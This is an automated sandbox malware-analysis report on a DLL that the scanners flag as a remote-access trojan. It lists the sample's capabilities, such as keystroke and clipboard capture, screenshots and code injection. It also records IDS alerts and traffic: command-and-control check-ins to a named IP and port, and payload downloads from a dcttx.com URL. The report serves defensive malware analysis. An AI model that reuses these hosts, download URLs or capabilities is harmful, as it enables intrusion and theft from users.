Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HLMJbase.dll

Overview

General Information

Sample name:HLMJbase.dll
Analysis ID:1579416
MD5:250eb1ef1645f13252ef13c14ba66d51
SHA1:4aa14d113af1d74fbd1adbc16c10126b69878d0b
SHA256:dacdac1e333a1f45700e3707e617ff49c457226604f1ffa160fc3faf9b6810b3
Tags:dlluser-smica83
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6972 cmdline: loaddll32.exe "C:\Users\user\Desktop\HLMJbase.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7116 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 6156 cmdline: rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6204 cmdline: rundll32.exe C:\Users\user\Desktop\HLMJbase.dll,NvOptimusEnablement MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 1900 cmdline: rundll32.exe "C:\Users\user\Desktop\HLMJbase.dll",NvOptimusEnablement MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-22T09:29:07.990203+010020528751A Network Trojan was detected192.168.2.44973645.204.213.997677TCP
2024-12-22T09:30:23.404849+010020528751A Network Trojan was detected192.168.2.44973945.204.213.997677TCP
2024-12-22T09:31:35.424214+010020528751A Network Trojan was detected192.168.2.44974045.204.213.997677TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC3E8E0 EncryptMessage,3_2_6CC3E8E0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC10332 DecryptMessage,3_2_6CC10332
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC39840 DecryptMessage,memset,3_2_6CC39840
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC3961E EncryptMessage,3_2_6CC3961E
Source: HLMJbase.dllStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: HLMJbase.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: HLMJbase.pdb source: rundll32.exe, 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3546373145.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.3546252526.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, HLMJbase.dll
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: z:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: x:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: v:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: t:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: r:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: p:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: n:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: l:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: j:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: h:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: f:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: b:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: y:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: w:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: u:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: s:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: q:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: o:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: m:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: k:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: i:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: g:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: e:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: [:Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB8060 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,3_2_04DB8060

Networking

barindex
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49736 -> 45.204.213.99:7677
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49739 -> 45.204.213.99:7677
Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49740 -> 45.204.213.99:7677
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 38.147.186.138 443Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.204.213.99 7677Jump to behavior
Source: global trafficTCP traffic: 192.168.2.4:49736 -> 45.204.213.99:7677
Source: global trafficHTTP traffic detected: GET /19/7.txt HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/7.txt HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/77.bin HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/77.bin HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/7.txt HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/77.bin HTTP/1.1accept: */*host: dcttx.com
Source: Joe Sandbox ViewASN Name: CODECCLOUD-AS-APCodecCloudHKLimitedHK CODECCLOUD-AS-APCodecCloudHKLimitedHK
Source: Joe Sandbox ViewASN Name: ITACE-AS-APItaceInternationalLimitedHK ITACE-AS-APItaceInternationalLimitedHK
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: unknownTCP traffic detected without corresponding DNS query: 45.204.213.99
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04203340 recv,timeGetTime,_memmove,3_2_04203340
Source: global trafficHTTP traffic detected: GET /19/7.txt HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/7.txt HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/77.bin HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/77.bin HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/7.txt HTTP/1.1accept: */*host: dcttx.com
Source: global trafficHTTP traffic detected: GET /19/77.bin HTTP/1.1accept: */*host: dcttx.com
Source: global trafficDNS traffic detected: DNS query: dcttx.com
Source: rundll32.exe, 00000003.00000003.1698661519.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1699780132.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1723716813.0000000002EE6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dcttx.com/19/7.txt
Source: rundll32.exe, 00000003.00000003.1698661519.00000000028B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dcttx.com/19/7.txt)
Source: rundll32.exe, rundll32.exe, 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.3546373145.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000005.00000002.3546252526.000000006CC66000.00000002.00000001.01000000.00000003.sdmp, HLMJbase.dllString found in binary or memory: https://dcttx.com/19/7.txtFailed
Source: rundll32.exe, 00000003.00000003.1729874036.00000000028B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2157580790.00000000028AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.3543030625.000000000287A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1698661519.00000000028B5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.2339917557.00000000028AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1729791896.000000000289D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3542816522.0000000002E9C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1794106955.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1976663029.0000000002EAA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730735202.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730835411.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1699780132.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1699722110.0000000002EF4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754289743.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754407677.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166846758.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1802814248.0000000002EE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1723716813.0000000002EE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3542903898.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1723632245.0000000002F22000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754193127.0000000002ECD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dcttx.com/19/77.bin
Source: rundll32.exe, 00000003.00000003.1729874036.00000000028B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1729791896.000000000289D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dcttx.com/19/77.bin)
Source: rundll32.exe, 00000005.00000003.1754289743.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754407677.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754193127.0000000002ECD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dcttx.com/19/77.bin.
Source: rundll32.exe, 00000003.00000003.1729874036.00000000028B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1729791896.000000000289D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dcttx.com/19/77.bin3
Source: rundll32.exe, 00000005.00000003.1754289743.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754407677.0000000002ECD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2166846758.0000000002EE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1802814248.0000000002EE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1723716813.0000000002EE6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.3542903898.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1754193127.0000000002ECD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dcttx.com/19/77.bin8
Source: rundll32.exe, 00000004.00000003.1730735202.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730835411.0000000002E9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dcttx.com/19/77.binA
Source: rundll32.exe, 00000004.00000003.1730735202.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730835411.0000000002E9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dcttx.com/19/77.binD
Source: rundll32.exe, 00000004.00000003.1730735202.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730835411.0000000002E9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dcttx.com/19/77.bin_
Source: rundll32.exe, 00000004.00000003.1730735202.0000000002E9B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1730835411.0000000002E9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dcttx.com/19/77.binf
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 38.147.186.138:443 -> 192.168.2.4:49735 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]3_2_04DBE7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]3_2_04DBE7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]3_2_04DBE7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]3_2_04DBE7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]4_2_055AE7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]4_2_055AE7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]4_2_055AE7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]4_2_055AE7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]5_2_0535E7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]5_2_0535E7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]5_2_0535E7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: [esc]5_2_0535E7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DBE7B0 CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,3_2_04DBE7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DBE7B0 CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,3_2_04DBE7B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DBBBF0 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,3_2_04DBBBF0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DBE450 CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,3_2_04DBE450
Source: C:\Windows\SysWOW64\rundll32.exeWindows user hook set: 0 mouse low level C:\Windows\System32\DINPUT8.dllJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBF4854 NtCreateFile,RtlNtStatusToDosError,CreateIoCompletionPort,SetFileCompletionNotificationModes,GetLastError,CloseHandle,3_2_6CBF4854
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBF4268 NtDeviceIoControlFile,RtlNtStatusToDosError,3_2_6CBF4268
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBC3942 SetThreadErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,memmove,memmove,memmove,memmove,GetCurrentProcess,NtAllocateVirtualMemory,memmove,GetCurrentProcess,NtCreateThreadEx,GetCurrentProcess,FreeLibrary,CreateWaitableTimerExW,CreateWaitableTimerExW,SetWaitableTimer,WaitForSingleObject,CloseHandle,CloseHandle,Sleep,3_2_6CBC3942
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC483D0 GetStdHandle,GetLastError,GetConsoleMode,NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,CloseHandle,3_2_6CC483D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBF3EDC NtCancelIoFileEx,RtlNtStatusToDosError,3_2_6CBF3EDC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBF4268: NtDeviceIoControlFile,RtlNtStatusToDosError,3_2_6CBF4268
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DBB3D0 ExitWindowsEx,3_2_04DBB3D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DBB3F4 ExitWindowsEx,3_2_04DBB3F4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DBB3AC ExitWindowsEx,3_2_04DBB3AC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055AB3D0 ExitWindowsEx,4_2_055AB3D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055AB3F4 ExitWindowsEx,4_2_055AB3F4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_055AB3AC ExitWindowsEx,4_2_055AB3AC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0535B3AC ExitWindowsEx,5_2_0535B3AC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0535B3F4 ExitWindowsEx,5_2_0535B3F4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0535B3D0 ExitWindowsEx,5_2_0535B3D0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04210CAE3_2_04210CAE
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_042024B03_2_042024B0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04212D613_2_04212D61
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_042111FF3_2_042111FF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04211E2C3_2_04211E2C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0420B6A63_2_0420B6A6
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_042117503_2_04211750
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB6E603_2_04DB6E60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB6BE03_2_04DB6BE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB24A03_2_04DB24A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DCDDF03_2_04DCDDF0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DCD89F3_2_04DCD89F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DB88703_2_04DB8870
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DCF9FF3_2_04DCF9FF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DCEA1D3_2_04DCEA1D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DC83813_2_04DC8381
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DCE3413_2_04DCE341
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC36D3C3_2_6CC36D3C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC1481F3_2_6CC1481F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC1AA6C3_2_6CC1AA6C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC084693_2_6CC08469
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC11C983_2_6CC11C98
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC39CA83_2_6CC39CA8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBC39423_2_6CBC3942
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC290A83_2_6CC290A8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC54CCF3_2_6CC54CCF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC62C953_2_6CC62C95
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC02D0F3_2_6CC02D0F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBEEE053_2_6CBEEE05
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBDCF243_2_6CBDCF24
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC128F93_2_6CC128F9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC628933_2_6CC62893
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CC548983_2_6CC54898
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBFA8143_2_6CBFA814
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6CBCE8753_2_6CBCE875
